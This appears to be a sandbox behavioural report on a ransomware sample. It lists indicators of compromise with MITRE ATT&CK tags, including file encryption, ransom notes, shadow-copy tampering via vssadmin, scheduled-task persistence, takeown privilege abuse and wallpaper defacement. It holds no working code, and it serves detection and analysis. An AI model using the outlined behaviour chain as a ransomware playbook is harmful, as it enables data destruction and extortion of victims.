File opened for modification	C:\Users\Public\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VYXNV57O\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

XK0Utxzv64.exe67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened (read-only)	\??\A:	XK0Utxzv64.exe
File opened (read-only)	\??\K:	XK0Utxzv64.exe
File opened (read-only)	\??\N:	XK0Utxzv64.exe
File opened (read-only)	\??\O:	XK0Utxzv64.exe
File opened (read-only)	\??\T:	XK0Utxzv64.exe
File opened (read-only)	\??\N:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\J:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\G:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\Z:	XK0Utxzv64.exe
File opened (read-only)	\??\G:	XK0Utxzv64.exe
File opened (read-only)	\??\R:	XK0Utxzv64.exe
File opened (read-only)	\??\S:	XK0Utxzv64.exe
File opened (read-only)	\??\I:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\B:	XK0Utxzv64.exe
File opened (read-only)	\??\I:	XK0Utxzv64.exe
File opened (read-only)	\??\V:	XK0Utxzv64.exe
File opened (read-only)	\??\W:	XK0Utxzv64.exe
File opened (read-only)	\??\Y:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\W:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\P:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\M:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\E:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\Z:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\V:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\R:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\U:	XK0Utxzv64.exe
File opened (read-only)	\??\S:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\O:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	XK0Utxzv64.exe
File opened (read-only)	\??\T:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\L:	XK0Utxzv64.exe
File opened (read-only)	\??\Y:	XK0Utxzv64.exe
File opened (read-only)	\??\J:	XK0Utxzv64.exe
File opened (read-only)	\??\P:	XK0Utxzv64.exe
File opened (read-only)	\??\X:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\Q:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	XK0Utxzv64.exe
File opened (read-only)	\??\E:	XK0Utxzv64.exe
File opened (read-only)	\??\M:	XK0Utxzv64.exe
File opened (read-only)	\??\Q:	XK0Utxzv64.exe
File opened (read-only)	\??\X:	XK0Utxzv64.exe
File opened (read-only)	\??\U:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\L:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\K:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 myexternalip.com

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\UjEIYv0E.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\it-IT\PurblePlace.exe.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\LogoBeta.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\DebugMerge.ex_	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\external_extensions.json	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\meta-index	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\bin\policytool.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\kn.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\external_extensions.json	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

828 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1600 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exeXK0Utxzv64.exe

pid process

1176 powershell.exe
1992 powershell.exe
268 XK0Utxzv64.exe
268 XK0Utxzv64.exe
268 XK0Utxzv64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

XK0Utxzv64.exe

pid process

268 XK0Utxzv64.exe

pid	process
828	schtasks.exe

pid	process
1600	vssadmin.exe

pid	process
1176	powershell.exe
1992	powershell.exe
268	XK0Utxzv64.exe
268	XK0Utxzv64.exe
268	XK0Utxzv64.exe

pid	process
268	XK0Utxzv64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeXK0Utxzv64.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	268	XK0Utxzv64.exe
Token: SeLoadDriverPrivilege	268	XK0Utxzv64.exe
Token: SeTakeOwnershipPrivilege	1476	takeown.exe
Token: SeTakeOwnershipPrivilege	1328	takeown.exe
Token: SeTakeOwnershipPrivilege	1028	takeown.exe
Token: SeBackupPrivilege	1792	vssvc.exe
Token: SeRestorePrivilege	1792	vssvc.exe
Token: SeAuditPrivilege	1792	vssvc.exe
Token: SeTakeOwnershipPrivilege	1184	takeown.exe
Token: SeTakeOwnershipPrivilege	1956	takeown.exe
Token: SeTakeOwnershipPrivilege	1628	takeown.exe
Token: SeTakeOwnershipPrivilege	564	takeown.exe
Token: SeTakeOwnershipPrivilege	1680	takeown.exe
Token: SeTakeOwnershipPrivilege	1880	takeown.exe
Token: SeTakeOwnershipPrivilege	1628	takeown.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe
Token: SeTakeOwnershipPrivilege	1028	takeown.exe
Token: SeTakeOwnershipPrivilege	792	takeown.exe
Token: SeTakeOwnershipPrivilege	996	takeown.exe
Token: SeTakeOwnershipPrivilege	1680	takeown.exe
Token: SeTakeOwnershipPrivilege	1352	takeown.exe
Token: SeTakeOwnershipPrivilege	1152	takeown.exe
Token: SeTakeOwnershipPrivilege	340	takeown.exe
Token: SeTakeOwnershipPrivilege	556	takeown.exe
Token: SeTakeOwnershipPrivilege	936	takeown.exe
Token: SeTakeOwnershipPrivilege	1956	takeown.exe
Token: SeTakeOwnershipPrivilege	1328	takeown.exe
Token: SeTakeOwnershipPrivilege	1176	takeown.exe
Token: SeTakeOwnershipPrivilege	324	takeown.exe
Token: SeTakeOwnershipPrivilege	1184	takeown.exe
Token: SeTakeOwnershipPrivilege	1028	takeown.exe
Token: SeTakeOwnershipPrivilege	1908	takeown.exe
Token: SeTakeOwnershipPrivilege	1072	takeown.exe
Token: SeTakeOwnershipPrivilege	204	takeown.exe
Token: SeTakeOwnershipPrivilege	748	takeown.exe
Token: SeTakeOwnershipPrivilege	884	takeown.exe
Token: SeTakeOwnershipPrivilege	1328	takeown.exe
Token: SeTakeOwnershipPrivilege	664	takeown.exe
Token: SeTakeOwnershipPrivilege	300	takeown.exe
Token: SeTakeOwnershipPrivilege	1184	takeown.exe
Token: SeTakeOwnershipPrivilege	996	takeown.exe
Token: SeTakeOwnershipPrivilege	596	takeown.exe
Token: SeTakeOwnershipPrivilege	1844	takeown.exe
Token: SeTakeOwnershipPrivilege	556	takeown.exe
Token: SeTakeOwnershipPrivilege	1608	takeown.exe
Token: SeTakeOwnershipPrivilege	556	takeown.exe
Token: SeTakeOwnershipPrivilege	1628	takeown.exe
Token: SeTakeOwnershipPrivilege	216	takeown.exe
Token: SeTakeOwnershipPrivilege	996	takeown.exe
Token: SeTakeOwnershipPrivilege	1328	takeown.exe
Token: SeTakeOwnershipPrivilege	784	takeown.exe
Token: SeTakeOwnershipPrivilege	220	takeown.exe
Token: SeTakeOwnershipPrivilege	340	takeown.exe
Token: SeTakeOwnershipPrivilege	564	takeown.exe
Token: SeTakeOwnershipPrivilege	1912	takeown.exe
Token: SeTakeOwnershipPrivilege	228	takeown.exe
Token: SeTakeOwnershipPrivilege	1184	takeown.exe
Token: SeTakeOwnershipPrivilege	1712	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe
Token: SeTakeOwnershipPrivilege	1908	takeown.exe
Token: SeTakeOwnershipPrivilege	1476	takeown.exe
Token: SeTakeOwnershipPrivilege	364	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exeNWD6oM0v.execmd.execmd.execmd.execmd.exewscript.execmd.execmd.exe

description	pid	process	target process
PID 1404 wrote to memory of 1296	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1296	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1296	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1296	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 568	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWD6oM0v.exe
PID 1404 wrote to memory of 568	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWD6oM0v.exe
PID 1404 wrote to memory of 568	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWD6oM0v.exe
PID 1404 wrote to memory of 568	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWD6oM0v.exe
PID 568 wrote to memory of 556	568	NWD6oM0v.exe	cmd.exe
PID 568 wrote to memory of 556	568	NWD6oM0v.exe	cmd.exe
PID 568 wrote to memory of 556	568	NWD6oM0v.exe	cmd.exe
PID 568 wrote to memory of 556	568	NWD6oM0v.exe	cmd.exe
PID 556 wrote to memory of 1176	556	cmd.exe	powershell.exe
PID 556 wrote to memory of 1176	556	cmd.exe	powershell.exe
PID 556 wrote to memory of 1176	556	cmd.exe	powershell.exe
PID 556 wrote to memory of 1176	556	cmd.exe	powershell.exe
PID 1404 wrote to memory of 1824	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1824	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1824	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1824	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1824 wrote to memory of 1992	1824	cmd.exe	powershell.exe
PID 1824 wrote to memory of 1992	1824	cmd.exe	powershell.exe
PID 1824 wrote to memory of 1992	1824	cmd.exe	powershell.exe
PID 1824 wrote to memory of 1992	1824	cmd.exe	powershell.exe
PID 1404 wrote to memory of 1156	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1156	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1156	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1156	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1572	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1572	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1572	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1404 wrote to memory of 1572	1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1572 wrote to memory of 1288	1572	cmd.exe	wscript.exe
PID 1572 wrote to memory of 1288	1572	cmd.exe	wscript.exe
PID 1572 wrote to memory of 1288	1572	cmd.exe	wscript.exe
PID 1572 wrote to memory of 1288	1572	cmd.exe	wscript.exe
PID 1156 wrote to memory of 2016	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 2016	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 2016	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 2016	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1936	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1936	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1936	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1936	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1540	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1540	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1540	1156	cmd.exe	reg.exe
PID 1156 wrote to memory of 1540	1156	cmd.exe	reg.exe
PID 1288 wrote to memory of 1628	1288	wscript.exe	cmd.exe
PID 1288 wrote to memory of 1628	1288	wscript.exe	cmd.exe
PID 1288 wrote to memory of 1628	1288	wscript.exe	cmd.exe
